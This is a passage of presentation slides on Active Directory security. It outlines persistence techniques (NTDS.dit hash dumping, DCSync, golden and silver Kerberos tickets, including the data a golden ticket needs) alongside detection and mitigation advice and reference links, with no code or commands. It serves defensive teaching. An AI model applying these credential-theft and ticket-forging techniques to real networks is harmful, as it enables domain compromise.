  • 74. Lateral Movement Detection •Turn on Audit for Local Account Logon •Turn on Audit for Kerberos • Look out for Domain Names in lower case/non-standard (Not comprehensive) • Look out for Ticket Encryption Type 0x17/0x18 for RC4 (Not comprehensive) •More Information: https://dfir-blog.com/2015/12/13/protecting-windows-networks-ker beros-attacks/ https://dfir-blog.com/2016/03/13/how-to-parse-windows-eventlog/ 74
  • 75. Persistence •Hash Dump & Crack the Hashes •Golden Ticket •Silver Ticket 75
  • 76. Hash Dump & Crack The Hashes •Old School • Get NTDS.dit file • Backup • Virtual Machine Disk • Shadow Volume • Process NTDS.dit for Hashes •New School • DCSync (No need for direct access to NTDS.dit) 76
  • 77. DCSync •Impersonate as a Domain Controller •Replicate User Credentials via Directory Replication Service (DRS) Remote Protocol •No Code Execution required, however “Domain Admins” privilege is needed •If used with “Domain Controllers” privilege, it will not be logged 77
  • 79. Golden Ticket • Forged TGT with Admin Privilege, then PTT • TGT is encrypted & signed by • Domain KRBTGT’s secret key • Important to note that KRBTGT’s password is almost never changed • Information required to create Golden Ticket • Domain Name • Domain SID • Domain KRBTGT NTLM Hash/(e)Keys • UserID for Impersonation 79
  • 83. Silver Ticket •Forged Service Ticket •Require only the service account key instead of KRBTGT •Access is restricted to the specific Service •More Information: https://adsecurity.org/?p=2011 83
  • 86. Persistence Mitigation and Detection •Change KRBTGT’s password twice (to purge Password History) and regularly •Look out for RC4 Kerberos traffic – Vista and onwards default cipher for Kerberos is AES (Not comprehensive) •Use Group Managed Service Account •More information: https://adsecurity.org/?p=1515 86
  • 87. Mitigations for PowerShell Activities ● Lock down PowerShell.exe, PowerShell_ISE.exe (Not Ideal) ● Uninstall PowerShell v2 ● Use PowerShell v5 with ○ Constrained Language Mode with AppLocker / Device Guard ○ Log all PowerShell Activities (Module Logging, Script Block Logging, System-wide Transcript Logging) ● More information: https://adsecurity.org/?p=2604 87
  • 88. Microsoft Advanced Threat Analytics (ATA) • Machine Learning Platform to detect quite a number of things we have discussed • Receive logs and events from SIEM and Windows Event Forwarding(WEF) • More information: https://docs.microsoft.com/en-us/advanced-threat-analytics/understand-expl ore/ata-threats https://adsecurity.org/?p=1583 https://gallery.technet.microsoft.com/Advanced-Threat-Analytics-8b0a86bc/fi le/169608/1/ATA%20Playbook.pdf 88
  • 89. Microsoft Advanced Threat Analytics 89 Source: https://blogs.technet.microsoft.com/enterprisemobility/2015/05/04/microsoft-advanced-threat-analytics-public-preview-releas e-is-now-available/
  • 91. Reference • Adversarial Tactics, Techniques & Common Knowledge https://attack.mitre.org/wiki/Main_Page • Attack Methods for Gaining Domain Admin Rights in Active Directory https://adsecurity.org/?p=2362 • PROTECTING WINDOWS NETWORKS – KERBEROS ATTACKS https://dfir-blog.com/2015/12/13/protecting-windows-networks-kerberos-attacks/ • The Most Common Active Directory Security Issues and What You Can Do to Fix Them https://adsecurity.org/?p=1684 • Building an Empire with PowerShell http://www.slideshare.net/harmj0y/building-an-empire-with-powershell 91
  • 92. Reference • Mimikatz and DCSync and ExtraSids, Oh My http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/ • Make PowerView Great Again http://www.harmj0y.net/blog/powershell/make-powerview-great-again/ • Six Degree of Domain Admin https://media.defcon.org/DEF%20CON%2024/DEF%20CON%2024%20presentations/DEFCON-24-Robbins-Vazarkar-Schroeder-Six- Degrees-of-Domain-Admin.pdf • kerberos, kerberoast and golden tickets https://leonjza.github.io/blog/2016/01/09/kerberos-kerberoast-and-golden-tickets/ • Mimikatz 2.0 - Silver Ticket Walkthrough https://www.beneaththewaves.net/Projects/Mimikatz_20_-_Silver_Ticket_Walkthrough.html#Why 92